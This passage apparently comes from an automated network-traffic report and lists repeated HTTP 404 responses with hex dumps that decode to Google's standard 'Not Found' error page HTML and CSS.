64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 